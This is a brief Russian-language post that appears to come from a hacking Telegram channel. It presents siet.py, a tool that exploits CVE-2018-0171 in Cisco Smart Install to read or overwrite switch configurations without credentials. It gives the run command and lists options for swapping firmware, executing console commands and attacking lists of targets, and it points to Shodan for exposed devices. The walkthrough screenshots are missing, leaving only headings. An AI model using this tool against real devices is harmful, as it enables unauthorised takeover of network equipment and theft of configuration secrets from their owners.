Чтение/изменение конфига Cisco (Smart Install Exploitation Tool)

Чтение/изменение конфига Cisco (Smart Install Exploitation Tool)

@webware

t.me/webware

Всем привет. На фоне прошумевшей по всему миру недавно волной эксплуатации CVE-2018-0171 хочу поведать о скрипте, умеющем читать/писать конфиг сетевого оборудования Cisco с открытым TCP 4786 портом и без установленного патча, не имея учетной записи.


Smart Install Exploitation Tool


Установка:

И запуск:

python siet.py -g -i <target ip>


Параметры:

-t test device for smart install.

-g get device config.

-c change device config.

-u update device IOS.

-e execute commands in device's console.

-i ip address of target device

-l ip list of targets (file path)


Пример использования.

Определим наличие доступности сервиса:

Скачиваем конфиг коммутатора:

Переходим в папку tftp и читаем конфиг:

Перезаписаписывать конфиг не стал, так как коммутатор нельзя было убивать.


В дополнение скрин с шодана с открытым 4786 портом (думаю после прошедших выходных сильно меньше по факту)

Источник codeby.net

Report Page